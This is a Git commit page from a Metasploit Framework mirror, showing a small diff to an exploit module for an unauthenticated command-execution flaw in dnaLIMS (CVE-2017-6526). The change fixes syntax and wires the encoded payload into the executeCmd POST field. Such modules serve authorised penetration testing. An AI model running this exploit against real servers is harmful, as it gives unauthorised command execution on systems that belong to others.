infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

changes to file per pr

bug/bundler_fix
h00die 2017-03-20 10:16:42 -04:00
parent 0ab3ad86ee
commit fe5167bf26
1 changed files with 4 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
modules/exploits/linux/http/dnalims_admin_exec.rb
View File

@ -1,5 +1,3 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
@ -18,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Description' => %q{ 'Description' => %q{
This module utilizes an administrative module which allows for This module utilizes an administrative module which allows for
command execution. This page is completely unprotected from any command execution. This page is completely unprotected from any
authentication when given a POST command. authentication when given a POST request.
}, },
'Author' => 'Author' =>
[ [
@ -28,8 +26,8 @@ class MetasploitModule < Msf::Exploit::Remote
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
[ [
['CVE', '2017-6526'] ['CVE', '2017-6526'],
['US-CERT-VU', '929263'] ['US-CERT-VU', '929263'],
['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/'] ['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/']
], ],
'Platform' => %w( linux unix ), 'Platform' => %w( linux unix ),
@ -96,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
'username' => '', 'username' => '',
'navUserName' => '', 'navUserName' => '',
'Action' => 'executeCmd', 'Action' => 'executeCmd',
'executeCmdData' => 'ls', 'executeCmdData' => payload.encoded,
} }
) )
vprint_good(res.body) vprint_good(res.body)